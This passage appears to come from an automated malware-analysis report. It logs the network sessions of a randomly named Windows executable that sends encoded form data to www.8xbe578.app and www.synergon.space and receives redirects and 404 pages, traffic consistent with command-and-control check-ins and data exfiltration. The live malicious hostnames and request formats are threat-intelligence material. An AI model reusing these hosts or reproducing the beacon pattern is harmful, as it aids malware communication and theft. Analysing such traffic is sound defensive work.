                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&amp;efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc='" /> <title>Redirecting to http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&amp;efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc=</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&amp;efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc=">http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&amp;efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6w
                                                    Aug 5, 2024 15:31:57.075690031 CEST | 65                | IN        | Data Raw: 5a 54 56 4f 41 68 71 35 4e 41 76 66 33 33 51 39 41 6e 77 46 32 2b 50 36 62 7a 31 42 4d 55 76 75 33 37 70 4d 37 71 63 3d 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: ZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc=</a>. </body></html>


                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                    9          | 192.168.2.4 | 55407       | 3.33.130.190   | 80               | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:02.273204088 CEST | 700               | OUT       | POST /1nsp/ HTTP/1.1
                                                    Host: www.8xbe578.app
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.8xbe578.app
                                                    Referer: http://www.8xbe578.app/1nsp/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 33 75 62 4b 46 61 62 31 34 6d 52 77 7a 4d 4d 74 52 38 6f 66 6b 4c 5a 63 54 75 62 68 55 54 51 70 7a 64 6f 63 65 44 68 49 6f 7a 62 6c 52 4c 6f 5a 30 46 53 31 74 69 37 35 4b 74 63 4d 7a 46 70 38 69 30 59 34 6b 34 43 63 32 54 41 6f 6d 38 2f 69 6c 6b 6b 78 4f 61 6b 79 63 37 74 70 76 46 6a 36 53 66 77 70 49 44 59 78 51 33 34 65 30 50 2f 41 64 6f 42 65 2f 32 41 30 6c 43 66 6a 68 38 71 36 43 57 33 49 55 69 36 69 6f 68 4c 52 34 53 68 78 42 67 54 56 42 6d 54 69 35 39 78 73 76 76 44 53 50 30 71 56 42 6b 78 57 66 41 4f 67 6e 32 44 38 76 4c 72 72 30 79 6b 72 49 32 61 4b 30 43 52 67 6c 41 3d 3d
                                                    Data Ascii: efM=3ubKFab14mRwzMMtR8ofkLZcTubhUTQpzdoceDhIozblRLoZ0FS1ti75KtcMzFp8i0Y4k4Cc2TAom8/ilkkxOakyc7tpvFj6SfwpIDYxQ34e0P/AdoBe/2A0lCfjh8q6CW3IUi6iohLR4ShxBgTVBmTi59xsvvDSP0qVBkxWfAOgn2D8vLrr0ykrI2aK0CRglA==


                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                    10         | 192.168.2.4 | 55408       | 3.33.130.190   | 80               | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:04.814971924 CEST | 720               | OUT       | POST /1nsp/ HTTP/1.1
                                                    Host: www.8xbe578.app
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.8xbe578.app
                                                    Referer: http://www.8xbe578.app/1nsp/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 33 75 62 4b 46 61 62 31 34 6d 52 77 31 73 63 74 43 4c 30 66 6a 72 5a 66 63 4f 62 68 61 44 51 6c 7a 64 6b 63 65 41 74 59 70 42 50 6c 52 71 59 5a 31 42 4f 31 75 69 37 35 53 39 63 4a 2b 6c 70 37 69 30 56 50 6b 34 75 63 32 54 45 6f 6d 2b 6e 69 6b 58 38 79 50 4b 6b 30 56 62 74 76 69 6c 6a 36 53 66 77 70 49 44 6b 58 51 78 51 65 31 36 33 41 63 4a 42 64 35 47 41 33 69 43 66 6a 7a 4d 71 32 43 57 33 68 55 6a 6e 50 6f 69 7a 52 34 54 52 78 41 78 54 57 4c 6d 54 67 6b 74 77 70 72 66 4b 41 47 52 43 56 5a 47 63 77 64 6c 71 44 72 51 53 6d 2b 36 4b 38 6d 79 41 59 56 78 54 2b 35 42 73 70 2b 4e 49 51 6d 7a 41 43 49 6f 6a 4b 58 33 31 6e 5a 51 52 47 65 52 4d 3d
                                                    Data Ascii: efM=3ubKFab14mRw1sctCL0fjrZfcObhaDQlzdkceAtYpBPlRqYZ1BO1ui75S9cJ+lp7i0VPk4uc2TEom+nikX8yPKk0Vbtvilj6SfwpIDkXQxQe163AcJBd5GA3iCfjzMq2CW3hUjnPoizR4TRxAxTWLmTgktwprfKAGRCVZGcwdlqDrQSm+6K8myAYVxT+5Bsp+NIQmzACIojKX31nZQRGeRM=


                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                    11         | 192.168.2.4 | 55409       | 3.33.130.190   | 80               | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:07.347879887 CEST | 10802             | OUT       | POST /1nsp/ HTTP/1.1
                                                    Host: www.8xbe578.app
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.8xbe578.app
                                                    Referer: http://www.8xbe578.app/1nsp/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 33 75 62 4b 46 61 62 31 34 6d 52 77 31 73 63 74 43 4c 30 66 6a 72 5a 66 63 4f 62 68 61 44 51 6c 7a 64 6b 63 65 41 74 59 70 41 33 6c 52 59 51 5a 31 6d 36 31 76 69 37 35 4d 74 63 49 2b 6c 70 71 69 30 4e 4c 6b 34 79 6d 32 52 4d 6f 33 74 76 69 74 47 38 79 47 4b 6b 30 58 62 74 75 76 46 6a 4b 53 66 67 74 49 44 55 58 51 78 51 65 31 37 48 41 5a 6f 42 64 69 47 41 30 6c 43 66 56 68 38 72 70 43 53 54 62 55 6a 54 35 72 53 54 52 34 7a 42 78 43 44 37 57 57 57 54 6d 6e 74 77 50 72 66 58 65 47 56 62 75 5a 43 64 56 64 6a 57 44 37 56 7a 59 6a 37 76 67 37 69 4d 66 50 51 79 59 67 42 6b 6e 78 36 59 4c 71 67 73 70 66 6f 2f 79 66 6c 45 70 64 69 70 69 50 6c 50 70 63 33 4f 6c 47 6e 77 34 49 6e 73 63 47 59 45 70 74 39 4f 78 33 4f 57 35 52 59 46 30 46 33 58 37 54 75 31 76 6f 74 41 44 4b 6a 62 63 61 6b 46 54 59 62 30 61 4f 67 2b 6b 63 70 42 2f 74 7a 53 2b 44 79 49 54 6c 34 41 43 37 2f 4f 39 6c 35 37 4c 47 35 2b 38 64 55 33 73 74 6a 4d 67 47 66 6c 7a 43 59 47 75 66 45 72 32 39 78 4d 55 32 30 79 46 61 4a 56 4a 70 64 [TRUNCATED]
                                                    Data Ascii: efM= [TRUNCATED]


                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                    12         | 192.168.2.4 | 55410       | 3.33.130.190   | 80               | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:09.877701998 CEST | 436               | OUT       | GET /1nsp/?efM=6szqGuj1zCBS7eEVX649iJVBUL/fWzE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080Ir9qaLZUnG7yNOEpMTkzRXgFx77GcbRli0I=&GTP=uhqpjxIPh HTTP/1.1
                                                    Host: www.8xbe578.app
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:32:11.242788076 CEST | 393               | IN        | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:32:11 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 253
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 66 4d 3d 36 73 7a 71 47 75 6a 31 7a 43 42 53 37 65 45 56 58 36 34 39 69 4a 56 42 55 4c 2f 66 57 7a 45 32 75 2f 4d 32 59 53 70 55 6f 6a 6e 5a 55 64 38 77 6b 6d 43 6c 6c 68 76 78 45 37 45 76 6c 31 46 41 6d 56 39 36 6c 34 47 4f 38 7a 38 33 37 66 75 4e 6b 30 38 30 49 72 39 71 61 4c 5a 55 6e 47 37 79 4e 4f 45 70 4d 54 6b 7a 52 58 67 46 78 37 37 47 63 62 52 6c 69 30 49 3d 26 47 54 50 3d 75 68 71 70 6a 78 49 50 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?efM=6szqGuj1zCBS7eEVX649iJVBUL/fWzE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080Ir9qaLZUnG7yNOEpMTkzRXgFx77GcbRli0I=&GTP=uhqpjxIPh"}</script></head></html>


                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                    13         | 192.168.2.4 | 55411       | 109.95.158.127 | 80               | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:16.337836027 CEST | 709               | OUT       | POST /8unq/ HTTP/1.1
                                                    Host: www.synergon.space
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.synergon.space
                                                    Referer: http://www.synergon.space/8unq/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 63 6d 48 72 30 34 6f 51 36 66 57 68 50 4b 59 5a 52 4b 6f 6e 6f 4d 5a 6e 57 7a 2f 6d 43 4a 4b 49 35 73 59 65 38 36 34 67 58 30 4b 6b 65 31 4e 2b 69 30 62 32 6c 38 4e 75 57 61 67 71 4b 2b 6c 4c 57 68 67 52 38 68 75 47 46 59 4a 79 4d 4a 51 43 77 77 4b 7a 35 54 30 36 2b 6f 43 7a 57 45 78 43 6f 76 31 50 67 58 41 72 2b 4a 73 62 46 36 33 6d 4b 38 49 74 73 34 77 70 55 59 38 36 52 64 4b 2b 35 78 48 2f 4e 48 65 50 4b 55 78 54 6c 4c 52 43 36 68 53 6a 44 72 43 73 54 74 71 53 36 57 42 75 6b 7a 77 4c 34 41 4f 74 55 74 78 36 43 6c 61 72 72 35 64 61 73 58 52 39 67 56 65 42 39 61 2f 49 69 67 3d 3d
                                                    Data Ascii: efM=cmHr04oQ6fWhPKYZRKonoMZnWz/mCJKI5sYe864gX0Kke1N+i0b2l8NuWagqK+lLWhgR8huGFYJyMJQCwwKz5T06+oCzWExCov1PgXAr+JsbF63mK8Its4wpUY86RdK+5xH/NHePKUxTlLRC6hSjDrCsTtqS6WBukzwL4AOtUtx6Clarr5dasXR9gVeB9a/Iig==
                                                    Aug 5, 2024 15:32:16.990628004 CEST | 1043              | IN        | HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    x-powered-by: PHP/5.6.40
                                                    content-type: text/html; charset=UTF-8
                                                    content-length: 810
                                                    content-encoding: br
                                                    vary: Accept-Encoding
                                                    date: Mon, 05 Aug 2024 13:32:16 GMT
                                                    server: LiteSpeed
                                                    Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 [TRUNCATED]
                                                    Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0SJOhBEfXUQ[un468f'YhoJ">)ZzP(WDr&Z'lLe*[H,Ei=qEk4'Ci8BOp>CtpK)D@laRepMx@j`xVH!D|Nl7&a2G<gzrjA%X$D*k(b8}O)K3e.{AIdZ_T$T^h>B,cOZ6rB}Qbmcg"-RYbxghvli"F9[)FOXp,j~=uq}F)F_-QS6qiPH


                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                    14         | 192.168.2.4 | 55412       | 109.95.158.127 | 80               | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp                           | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:18.878891945 CEST | 729               | OUT       | POST /8unq/ HTTP/1.1
                                                    Host: www.synergon.space
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.synergon.space
                                                    Referer: http://www.synergon.space/8unq/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 63 6d 48 72 30 34 6f 51 36 66 57 68 4a 71 49 5a 42 62 6f 6e 35 73 59 56 5a 54 2f 6d 4d 70 4b 4d 35 72 51 65 38 37 73 77 58 48 69 6b 66 56 64 2b 77 78 37 32 6b 38 4e 75 64 36 67 72 45 65 6c 51 57 68 6c 73 38 67 2b 47 46 5a 74 79 4d 49 67 43 77 42 4b 77 72 54 30 34 6c 34 43 78 59 6b 78 43 6f 76 31 50 67 58 56 77 2b 4e 41 62 45 4a 76 6d 4a 5a 38 75 6c 59 77 71 43 49 38 36 48 64 4c 31 35 78 48 52 4e 43 48 59 4b 52 31 54 6c 4c 42 43 2b 6b 79 67 4b 72 43 71 66 39 72 51 2b 6b 73 39 39 44 4e 30 77 44 43 5a 5a 2b 6c 4f 44 6a 4c 78 36 49 38 4e 2b 58 31 4f 39 53 58 31 77 5a 43 42 35 70 49 43 6e 32 77 34 6a 68 63 46 47 6c 38 2b 76 44 52 2f 33 34 38 3d
                                                    Data Ascii: efM=cmHr04oQ6fWhJqIZBbon5sYVZT/mMpKM5rQe87swXHikfVd+wx72k8Nud6grEelQWhls8g+GFZtyMIgCwBKwrT04l4CxYkxCov1PgXVw+NAbEJvmJZ8ulYwqCI86HdL15xHRNCHYKR1TlLBC+kygKrCqf9rQ+ks99DN0wDCZZ+lODjLx6I8N+X1O9SX1wZCB5pICn2w4jhcFGl8+vDR/348=
                                                    Aug 5, 2024 15:32:19.544770956 CEST | 1043              | IN        | HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    x-powered-by: PHP/5.6.40
                                                    content-type: text/html; charset=UTF-8
                                                    content-length: 810
                                                    content-encoding: br
                                                    vary: Accept-Encoding
                                                    date: Mon, 05 Aug 2024 13:32:19 GMT
                                                    server: LiteSpeed
                                                    Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 [TRUNCATED]
                                                    Data Ascii: (810-byte Brotli-compressed body, not printable; bytes are in Data Raw above)


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    15 | 192.168.2.4 | 55413 | 109.95.158.127 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:21.410698891 CEST | 10811 | OUT | POST /8unq/ HTTP/1.1
                                                    Host: www.synergon.space
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.synergon.space
                                                    Referer: http://www.synergon.space/8unq/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 63 6d 48 72 30 34 6f 51 36 66 57 68 4a 71 49 5a 42 62 6f 6e 35 73 59 56 5a 54 2f 6d 4d 70 4b 4d 35 72 51 65 38 37 73 77 58 42 36 6b 66 6a 52 2b 7a 58 7a 32 6a 38 4e 75 51 61 67 75 45 65 6c 64 57 6c 78 67 38 6c 6d 34 46 62 6c 79 4d 71 6f 43 32 7a 69 77 68 54 30 34 73 59 43 77 57 45 78 58 6f 76 6c 51 67 58 46 77 2b 4e 41 62 45 50 44 6d 64 63 49 75 6a 59 77 70 55 59 38 6d 52 64 4c 64 35 31 72 6e 4e 47 61 6c 4b 46 42 54 6b 71 78 43 34 41 53 67 46 72 43 6f 65 4e 72 79 2b 6b 68 6c 39 41 34 48 77 41 66 4d 5a 2f 64 4f 42 53 6d 53 6f 70 4d 67 6c 48 39 4d 69 42 2f 74 37 72 71 67 6d 34 67 4f 76 44 67 53 2f 77 59 36 4a 69 56 72 31 78 78 6b 72 4e 68 49 52 32 48 69 2f 50 71 71 74 4f 7a 69 39 30 6b 52 59 74 78 58 2b 74 77 4d 44 49 79 6c 44 31 61 36 78 73 4c 6f 7a 4f 2f 64 32 73 6d 4d 51 45 66 76 47 52 78 44 36 6e 55 51 6f 45 49 75 55 52 70 66 4a 76 67 6e 49 74 61 49 48 38 36 43 36 54 73 49 57 47 43 6e 53 41 7a 70 36 42 4d 44 34 7a 7a 5a 64 6c 31 47 41 68 79 31 79 6e 4b 34 68 4e 53 6a 67 6b 54 5a 61 68 [TRUNCATED]
                                                    Data Ascii: efM=[TRUNCATED]
                                                    Aug 5, 2024 15:32:22.070451021 CEST | 1043 | IN | HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    x-powered-by: PHP/5.6.40
                                                    content-type: text/html; charset=UTF-8
                                                    content-length: 810
                                                    content-encoding: br
                                                    vary: Accept-Encoding
                                                    date: Mon, 05 Aug 2024 13:32:21 GMT
                                                    server: LiteSpeed
                                                    Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 [TRUNCATED]
                                                    Data Ascii: (810-byte Brotli-compressed body, not printable; bytes are in Data Raw above)


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    16 | 192.168.2.4 | 55414 | 109.95.158.127 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:23.941818953 CEST | 439 | OUT | GET /8unq/?GTP=uhqpjxIPh&efM=RkvL3PdT4df/OPkNHI4HmdhQbyPIEJeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6mviVClJubTHF4ksIetQZZ+rgXL6Dldbwq0cw= HTTP/1.1
                                                    Host: www.synergon.space
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:32:24.597884893 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    x-powered-by: PHP/5.6.40
                                                    content-type: text/html; charset=UTF-8
                                                    content-length: 2247
                                                    date: Mon, 05 Aug 2024 13:32:24 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 70 6c 22 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 41 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 68 6f 73 74 69 6e 67 2e 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 43 6f 70 79 72 69 67 68 74 22 [TRUNCATED]
